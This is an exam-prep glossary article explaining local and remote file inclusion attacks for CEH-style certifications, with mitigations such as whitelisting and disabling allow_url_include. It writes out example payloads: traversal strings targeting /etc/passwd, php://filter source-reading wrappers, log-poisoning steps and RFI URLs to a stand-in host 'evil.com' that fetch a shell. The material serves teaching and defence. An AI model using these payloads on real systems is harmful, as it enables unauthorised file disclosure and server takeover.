EC-CouncilEthical HackingSecurityIntermediate19 min read

What Is File Inclusion Attacks? Security Definition

Also known as: file inclusion attack, LFI, RFI, local file inclusion, remote file inclusion

Reviewed byJohnson Ajibi· Senior Network & Security Engineer · MSc IT Security
On This Page

Quick Definition

File inclusion attacks happen when a web application lets a user control which file to load, and the attacker tricks it into loading a harmful file instead of the intended one. This can let the attacker read sensitive files on the server or even run their own malicious code. It is like someone sneaking a fake ID through a door that checks badges but does not verify them properly.

Must Know for Exams

File inclusion attacks are a staple topic in the EC-Council Certified Ethical Hacker (CEH) exam, as well as in other security certifications like CompTIA Security+, OSCP, and GIAC. In the CEH exam, file inclusion is covered under the Web Application Hacking module. Candidates must understand the difference between LFI and RFI, know common vulnerable functions (especially in PHP), and be able to identify attack patterns in logs or URL parameters. Exam objectives often include identifying injection flaws, understanding input validation failures, and knowing how to exploit and mitigate these attacks.

The CEH exam may present scenario-based questions where you are given a web application URL with a suspicious parameter like “file=documents/report.pdf”. You might be asked to identify what type of attack is possible, or what the attacker can achieve by manipulating that parameter. Another question might ask which PHP configuration setting must be enabled for RFI to succeed (allow_url_include). Also, you may need to select the correct sequence of steps to exploit an LFI to read a sensitive file.

In the CompTIA Security+ exam, file inclusion falls under the broader category of injection attacks. Questions might ask about how to prevent directory traversal or which security control (like input validation) is most effective. For the OSCP exam, file inclusion is often part of the exploitation phase where you must gain a shell through a web vulnerability. Understanding the underlying mechanisms, such as how PHP wrappers work or how to use directory traversal to read system files, is essential for passing these certifications.

Simple Meaning

Imagine you are working at a front desk in an office building. Your job is to let visitors into different rooms based on the room number they give you. Now, suppose a visitor says they need to go to Room 101, and you open the door to the hallway that leads to Room 101. But what if that visitor actually gives you the room number for the server room, and you let them in because you never check whether they are allowed to go there? That is the basic idea of a file inclusion attack in a web application.

A web application often loads files, like images or page templates, based on a path provided by the user. For example, a website might show a page by reading a file named “home.html”. If an attacker can change that filename to something like “/etc/passwd”, the server will read that sensitive file and send it back to the attacker. This is called Local File Inclusion (LFI) because the file is already on the server.

Now suppose the attacker tells the application to load a file from a different website, like a remote server they control. That remote file might contain malicious code that, when loaded, executes on the vulnerable server. This is called Remote File Inclusion (RFI). It is like someone convincing the front desk to let in a package from an unknown sender, and that package contains a bomb. Both LFI and RFI are dangerous because they can lead to data theft, server compromise, or further attacks on the network.

Web applications that allow file inclusion often use parameters in the URL, like “page=about.php”. An attacker might change that to “page=../../etc/passwd” to escape the intended folder and access system files. The key vulnerability is that the application does not properly validate what the user is asking to load.

Full Technical Definition

File inclusion attacks are a class of web security vulnerabilities that occur when a server-side script dynamically includes files based on user-supplied input without adequate sanitization or validation. The two primary forms are Local File Inclusion (LFI) and Remote File Inclusion (RFI). In LFI, the attacker tricks the application into including a file that already exists on the target server, often using directory traversal sequences like “../” to navigate outside the web root. In RFI, the attacker provides a URL to a remote server hosting a malicious script, which the vulnerable application then fetches and executes.

Technically, these attacks exploit dynamic include functions in languages like PHP, where functions such as include(), require(), include_once(), and require_once() are used to load external files. When the file path is constructed from user input, an attacker can manipulate it. For example, if a PHP application uses “include(‘pages/” . $_GET[‘page’] . “.php”);”, an attacker can bypass the .php extension by injecting a null byte (deprecated in modern PHP but historically used) or by using URL encoding and path traversal.

Common LFI techniques include directory traversal (../../etc/passwd), using wrappers like php://filter to read source code, or /proc/self/environ to inject code via HTTP headers. RFI exploits rely on the allow_url_include PHP configuration directive being enabled. If enabled, the attacker can supply a full URL like “http://evil.com/shell.txt”. The server downloads that file and executes its content within the application context, often leading to remote code execution.

In real-world environments, file inclusion vulnerabilities are found in poorly coded content management systems, custom PHP applications, and legacy code. Mitigations include strict input validation, whitelisting allowed files, disabling allow_url_include, using a white-list of acceptable paths, and applying proper file system permissions. Security testing tools like web application scanners and manual penetration testing target these flaws specifically during ethical hacking assessments.

Real-Life Example

Think of a large office building with a central mailroom. Every day, packages arrive for different departments. The mailroom worker sorts them using the department number written on each package. The worker opens a chute that sends each package to the correct floor. Now imagine the worker does not check whether the department number is real or if the package is allowed to go there. An attacker could write a fake department number on a package, say “HR”, but inside the package is a tool designed to break into the HR filing cabinets.

In this analogy, the web application is the mailroom worker. The user-supplied parameter, like “page=about”, is the department number on the package. The actual file that gets loaded, like “about.php”, is the package contents. If the attacker changes the parameter to “page=../../etc/passwd”, it is like writing a department number that does not exist on the normal list but the mailroom worker still sends it. The server then sends back the contents of the password file, just like the package from the fake department ends up in HR.

Now for remote file inclusion, consider that the mailroom worker also accepts packages from outside couriers. If the attacker sends a package from a remote address with a note saying “This is for the CEO”, the worker might accept it without verifying the source. That remote package could contain a harmful device, like a listening bug. Once inside, the bug can eavesdrop on all conversations. Similarly, when a web application loads a remote file from an attacker-controlled server, that file may contain malicious PHP code that, once executed, gives the attacker full control over the web server.

Why This Term Matters

File inclusion attacks matter because they directly threaten the confidentiality, integrity, and availability of web applications and the servers they run on. For IT professionals, especially those in ethical hacking, penetration testing, or web development, understanding these attacks is critical to building and maintaining secure systems. A single LFI vulnerability can expose sensitive configuration files, database credentials, or even source code, which an attacker can use to pivot deeper into the network. In many cases, LFI can be escalated to remote code execution by leveraging log files, /proc files, or upload functions, allowing the attacker to run commands on the server.

In cloud infrastructure and shared hosting environments, file inclusion attacks can compromise multiple tenants on the same server. For example, a vulnerable WordPress plugin might allow an attacker to include the “wp-config.php” file from another site on the same server, stealing database passwords. System administrators must ensure that web applications are patched, file permissions are strict, and dangerous PHP functions are disabled or restricted.

Moreover, file inclusion is a common entry point for larger cyber attacks. After gaining initial access via LFI or RFI, attackers often install web shells, escalate privileges, and move laterally within the organization. For cybersecurity professionals, knowing how to detect, prevent, and test for file inclusion is part of the core skill set. Tools like Burp Suite, OWASP ZAP, and manual code review are used to find these vulnerabilities during security assessments. Ignoring this risk can lead to data breaches with severe financial and reputational consequences.

How It Appears in Exam Questions

In certification exams, file inclusion questions typically appear as scenario-based or multiple-choice questions that test your ability to recognize the vulnerability, understand its impact, and apply mitigations. One common pattern is a URL with a parameter like “page=home” or “file=about”. The question might ask: “An attacker modifies the parameter to ‘../../etc/passwd’ and receives the contents of the password file. What type of attack is this?” The correct answer would be Local File Inclusion or directory traversal.

Another question type gives you a PHP code snippet containing an include() function that uses a user-supplied variable without sanitization. You may need to identify which attack is possible, or which configuration change would prevent the attack. For example, a question might show: “$page = $_GET[‘page’]; include(‘includes/” . $page . “.php”);” and ask what the attacker can do. The correct response could be that the attacker can perform LFI by using path traversal and a null byte or other bypass.

Configuration questions are also common. You might be asked: “Which PHP setting should be disabled to prevent Remote File Inclusion?” with options including allow_url_include, allow_url_fopen, register_globals, or magic_quotes_gpc. The correct answer is allow_url_include. Troubleshooting questions might present a web application log showing failed attempts to include files from external URLs, and you must identify the attack in progress. Architecture questions may ask about the best place to implement controls (input validation, white-listing, or disable dangerous functions) to stop file inclusion at multiple layers.

Study ec-ceh

Test your understanding with exam-style practice questions.

Practise

Example Scenario

You are a security intern for a company that runs a website with a news section. The URL for a news article looks like this: https://example.com/news.php?article=story1. You notice that when you change the parameter to “article=../../etc/passwd”, the browser displays the contents of the server’s password file. You realize this is a Local File Inclusion vulnerability. The developer used the $_GET[‘article’] value directly in an include() statement without checking if the path is allowed.

As part of your ethical hacking assessment, you try to escalate this LFI to code execution. You find that the server has a log file that records user agents from web requests. You inject PHP code into the User-Agent header using a tool like Burp Suite, then use the LFI to include the log file. The PHP code in the log file executes, and you gain a shell on the server. You report this to the development team, advising them to sanitize the input, use a whitelist of allowed article names, and disable allow_url_include. This scenario shows how a simple LFI can lead to full server compromise.

Common Mistakes

Thinking LFI and RFI are the same attack with no difference in impact or method.

LFI involves including files already present on the target server, while RFI includes files from a remote server. RFI typically allows immediate remote code execution, whereas LFI often requires additional steps to achieve code execution.

Always distinguish between the two. LFI accesses local resources; RFI downloads and executes external code.

Believing that null byte injection (%00) always works in modern PHP to bypass extension appends.

Null byte injection was patched in PHP 5.3.4 and no longer works in modern versions. Relying on this technique shows outdated understanding.

Use other techniques like path traversal with directory slashes, or PHP wrappers such as php://filter to read files without code execution.

Assuming that file inclusion vulnerabilities only exist in PHP applications.

While PHP is the most common language for these attacks, other languages like ASP.NET, JSP, and Python can also have file inclusion flaws if dynamic file loading is used unsafely.

Check any application that uses user input to construct file paths, regardless of the programming language.

Thinking that disabling allow_url_include alone fully protects against all file inclusion attacks.

Disabling allow_url_include prevents RFI, but LFI attacks can still occur. LFI can be used to read sensitive files, and in some cases, combined with log poisoning to achieve code execution.

Implement comprehensive input validation, use a whitelist of allowed files, and apply least privilege to file system permissions.

Believing that file inclusion is only a client-side attack that cannot affect the server.

File inclusion is a server-side attack. The include() function runs on the server, so the attacker’s code executes in the server context, potentially leading to full server compromise.

Understand that any malicious file loaded with include() runs with server privileges, making it a critical server-side threat.

Exam Trap — Don't Get Fooled

An exam question shows a URL with “page=/etc/passwd” and asks “What type of attack is this?” The options include Directory Traversal, Local File Inclusion, Remote File Inclusion, and Command Injection. Many learners choose Directory Traversal because they see the path to /etc/passwd.

Remember that file inclusion attacks involve the server’s include function loading the file, not just reading it. If the application displays the file content because of an include statement, it is file inclusion. If the application reads the file via a file_get_contents or similar function and displays it, it might be directory traversal.

In exams, if the parameter is passed to include(), it is file inclusion.

Commonly Confused With

File Inclusion AttacksvsDirectory Traversal

Directory traversal, also known as path traversal, is a technique used to access files outside the web root by manipulating file paths. File inclusion attacks use directory traversal as a method, but the core difference is that file inclusion involves the server executing the included file, whereas directory traversal typically only reads or displays the file content without execution.

If you change “page=about” to “page=../../etc/passwd” and the server shows the password file content, that could be either directory traversal or LFI depending on whether the content is included or just read. If the server runs PHP code inside the included file, it is LFI.

File Inclusion AttacksvsRemote Code Execution (RCE)

Remote Code Execution is a broader category where an attacker can run arbitrary commands on the server. File inclusion is one specific technique that can lead to RCE. Not all RCE comes from file inclusion, and not all file inclusion immediately results in RCE, though RFI often does.

An attacker uses an LFI to include a malicious PHP payload from the system log file, which then executes, achieving RCE. The LFI was the method, RCE was the outcome.

File Inclusion AttacksvsServer-Side Request Forgery (SSRF)

SSRF occurs when a server makes requests to internal or external resources based on user input, but the attacker controls the URL. In RFI, the server includes a remote file. However, in SSRF, the server does not execute the returned file’s content as code; it simply fetches the resource, often to probe internal networks. RFI executes the remote file as code.

An attacker sends “url=http://internal-server/admin” and the server fetches that page and returns it; this is SSRF. If the attacker sends “page=http://evil.com/shell.txt” and the server executes the PHP code in shell.txt, it is RFI.

Step-by-Step Breakdown

1

Identify the Input Vector

The attacker finds a web application that uses a parameter in the URL or form data to load a file. For example, “index.php?page=home”. This is the entry point where user input is passed to a file inclusion function.

2

Test for Basic File Inclusion

The attacker tries simple path traversal payloads like “page=../” or “page=../../etc/passwd” to see if the application returns the content of unintended files. If successful, this confirms an LFI vulnerability.

3

Bypass Filters and Extension Appends

The developer may append a file extension (like .php) to the input. The attacker must bypass this using techniques like null bytes (deprecated), URL encoding, or path truncation. In modern PHP, the attacker may use wrappers like php://filter/convert.base64-encode/resource=index.php to read source code without execution.

4

Escalate to Code Execution

For LFI, the attacker looks for ways to write PHP code to a file that can be included. Common methods include poisoning log files (injecting code into User-Agent headers), using /proc/self/environ to inject payloads via HTTP headers, or uploading files through the application and including them.

5

Deploy a Web Shell and Maintain Access

Once code execution is achieved, the attacker uploads a web shell, a script that provides a command-line interface in the browser. This allows the attacker to run system commands, explore the server, and move laterally in the network.

Practical Mini-Lesson

File inclusion attacks are a critical web application vulnerability that every ethical hacker and web developer must understand thoroughly. In practice, these attacks are often found during vulnerability assessments using both automated scanners and manual testing. When you are testing a web application, start by mapping all parameters that appear to load dynamic content. Look for parameters named “page”, “file”, “path”, “doc”, or “includes”. Once you identify a potential parameter, test it with a simple path traversal sequence like “../../etc/passwd” on Unix systems or “..\..\windows\win.ini” on Windows.

It is important to use the correct number of directory levels. A common pitfall is using too few “../” sequences. Start with one level, then increase until you see a change in the response. If the application appends a file extension, try using a null byte (if PHP version is old enough), or use the php://filter wrapper to read files without worrying about the extension. For example, “php://filter/convert.base64-encode/resource=config.php” will return the file base64-encoded, which you can decode to see the source.

When testing for RFI, check if the application accepts URLs. Try inserting “http://evil.com/test.txt”. If the server includes the content of that file, it is vulnerable. However, many hosting environments disable allow_url_include by default today. Professionals should also test for second-order file inclusion, where user-supplied data is stored in a database or log file and later included. For example, if the application stores your username and later includes it in a template, you can register a username that contains PHP code.

In production environments, the best defense is to avoid using dynamic file inclusion altogether. If inclusion is necessary, use a whitelist of allowed filenames stored on the server. For example, instead of using user input directly, map it to a safe list: “$allowed = [‘home’ => ‘home.php’, ‘about’ => ‘about.php’];” and then use “include($allowed[$_GET[‘page’]]);”. This eliminates the possibility of path traversal. Also, disable unnecessary PHP wrappers and functions that can be abused, like allow_url_include and proc_open. Regular security testing, code reviews, and using web application firewalls with rules against path traversal and remote inclusion are essential layers of protection.

Memory Tip

Remember LFI and RFI by thinking: Local means “Stay in the building”, Remote means “Bring something from outside”. For exam questions, ask yourself: Is the attacker reading a local file (LFI) or loading a file from another site (RFI)? The parameter name often gives it away.

Covered in These Exams

Related Glossary Terms

Frequently Asked Questions

What is the difference between LFI and RFI?

LFI, or Local File Inclusion, loads files that already exist on the target server, like configuration files or logs. RFI, or Remote File Inclusion, loads files from an external server controlled by the attacker, often leading to immediate remote code execution.

Can file inclusion attacks be performed on web applications written in languages other than PHP?

Yes, although PHP is the most common due to functions like include() and require(). Other languages like ASP.NET, JSP, and Python can also have similar vulnerabilities if they dynamically include files based on user input without validation.

What is the most effective way to prevent file inclusion attacks?

Avoid using user input to construct file paths. If dynamic inclusion is required, use a whitelist of allowed filenames. Additionally, disable dangerous PHP settings like allow_url_include, apply strict file permissions, and implement proper input validation.

What is the php://filter wrapper and how is it used in LFI?

The php://filter wrapper allows an attacker to read file contents without executing them as PHP code. For example, “php://filter/convert.base64-encode/resource=config.php” returns the file base64-encoded, which the attacker can decode to see the source code.

What is log poisoning in the context of LFI?

Log poisoning is a technique where an attacker injects PHP code into a server log file, such as the access log or error log, by sending a malicious HTTP header. Then, using an LFI vulnerability, the attacker includes the log file, causing the PHP code to execute on the server.

How does allow_url_include configuration affect RFI?

The allow_url_include setting in php.ini controls whether PHP’s include functions can fetch remote files. If enabled, an attacker can supply a URL to a malicious script. If disabled, RFI is prevented, but LFI attacks remain possible.

Summary

File inclusion attacks are a serious web application vulnerability that allows attackers to read sensitive files or execute malicious code on a server by manipulating file paths used in include functions. The two primary types are Local File Inclusion (LFI), which accesses files already on the server, and Remote File Inclusion (RFI), which loads files from external sources. Understanding how these attacks work, how to detect them, and how to prevent them is essential for IT professionals, especially those pursuing ethical hacking or web security certifications like CEH.

In exams, expect scenario-based questions that test your ability to identify the attack type, select proper mitigation strategies, and understand the underlying technical mechanisms. Remember that the best defense is to avoid using user input in file inclusion paths, or to strictly validate it using a whitelist. With careful coding and regular security testing, file inclusion attacks can be effectively neutralized.